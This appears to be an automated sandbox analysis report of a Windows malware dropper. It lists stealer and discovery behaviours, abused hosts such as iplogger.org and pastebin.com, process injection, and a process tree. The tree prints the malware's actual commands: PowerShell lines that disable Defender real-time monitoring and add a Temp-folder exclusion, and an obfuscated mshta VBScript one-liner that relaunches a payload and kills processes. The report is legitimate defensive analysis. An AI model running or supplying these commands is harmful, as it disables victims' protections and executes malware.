N/A N/A C:\Users\Admin\AppData\Local\Temp\is-LQ6OA.tmp\Sat1481f5a7e3eccdd.tmp N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE N/A

Reads user/profile data of web browsers

spyware stealer

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Looks up geolocation information via web service

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2500 set thread context of 2508 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat1427fbafcf251.exe C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat1427fbafcf251.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-VQD2J.tmp\Sat1481f5a7e3eccdd.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat1481f5a7e3eccdd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14febbc433.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-LQ6OA.tmp\Sat1481f5a7e3eccdd.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat142b09ae40c44cf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat144474a564d26f29.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14b47e86b9c16b.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat142ac5249376e895.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14a7594cc5a0116.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat1427fbafcf251.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat1481f5a7e3eccdd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat1427fbafcf251.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat1487ca754e680f91.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-LQ6OA.tmp\Sat1481f5a7e3eccdd.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14febbc433.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14b47e86b9c16b.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14b47e86b9c16b.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14b47e86b9c16b.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14b47e86b9c16b.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14b47e86b9c16b.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14b47e86b9c16b.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14b47e86b9c16b.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14b47e86b9c16b.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14b47e86b9c16b.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14b47e86b9c16b.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14b47e86b9c16b.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14b47e86b9c16b.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14b47e86b9c16b.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14b47e86b9c16b.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14b47e86b9c16b.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14b47e86b9c16b.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14b47e86b9c16b.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14b47e86b9c16b.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14b47e86b9c16b.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14b47e86b9c16b.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14b47e86b9c16b.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14b47e86b9c16b.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14b47e86b9c16b.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14b47e86b9c16b.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14b47e86b9c16b.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14b47e86b9c16b.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14b47e86b9c16b.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14b47e86b9c16b.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14b47e86b9c16b.exe N/A
Token: 31 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14b47e86b9c16b.exe N/A
Token: 32 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14b47e86b9c16b.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14b47e86b9c16b.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14b47e86b9c16b.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14b47e86b9c16b.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14d32a38896785b13.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14f1396dfcf191bd.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2660 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe
PID 2660 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe
PID 2660 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe
PID 2660 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe
PID 2660 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe
PID 2660 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe
PID 2660 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe
PID 2872 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 900 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 900 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 900 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 900 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 900 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 900 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 900 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 2084 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 2084 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 2084 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 2084 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 2084 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 2084 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 2084 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 1676 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 1676 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 1676 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 1676 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 1676 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 1676 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 1676 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 2104 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 2104 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 2104 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 2104 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 2104 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 2104 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 2104 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 2068 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14f1396dfcf191bd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat142b09ae40c44cf.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14514904a4b.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14d32a38896785b13.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14febbc433.exe /mixone

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat142ac5249376e895.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat1487ca754e680f91.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat144474a564d26f29.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14b47e86b9c16b.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat1427fbafcf251.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat1481f5a7e3eccdd.exe

C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14d32a38896785b13.exe

Sat14d32a38896785b13.exe

C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat142ac5249376e895.exe

Sat142ac5249376e895.exe

C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat1427fbafcf251.exe

Sat1427fbafcf251.exe

C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat144474a564d26f29.exe

Sat144474a564d26f29.exe

C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat142b09ae40c44cf.exe

Sat142b09ae40c44cf.exe

C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14febbc433.exe

Sat14febbc433.exe /mixone

C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14f1396dfcf191bd.exe

Sat14f1396dfcf191bd.exe

C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat1487ca754e680f91.exe

Sat1487ca754e680f91.exe

C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14b47e86b9c16b.exe

Sat14b47e86b9c16b.exe

C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14514904a4b.exe

Sat14514904a4b.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14a7594cc5a0116.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14a7594cc5a0116.exe

Sat14a7594cc5a0116.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat1481f5a7e3eccdd.exe

Sat1481f5a7e3eccdd.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 800 -s 276

C:\Users\Admin\AppData\Local\Temp\is-VQD2J.tmp\Sat1481f5a7e3eccdd.tmp

"C:\Users\Admin\AppData\Local\Temp\is-VQD2J.tmp\Sat1481f5a7e3eccdd.tmp" /SL5="$80226,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat1481f5a7e3eccdd.exe"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbsCRIPT: cLOsE (CreaTEobject ( "wscRiPT.sHELl" ). rUN ( "cmD.EXE /C TYPe ""C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat142b09ae40c44cf.exe"" > JYCWewAX2vPOJ.EXE && stArT JyCwewAX2vPOJ.eXe /p~P_UpSUZjMkOKsY & If """" == """" for %f iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat142b09ae40c44cf.exe"" ) do taskkill -iM ""%~NXf"" /f " , 0 , tRUe) )

C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat1481f5a7e3eccdd.exe

"C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat1481f5a7e3eccdd.exe" /SILENT

C:\Users\Admin\AppData\Local\Temp\is-LQ6OA.tmp\Sat1481f5a7e3eccdd.tmp

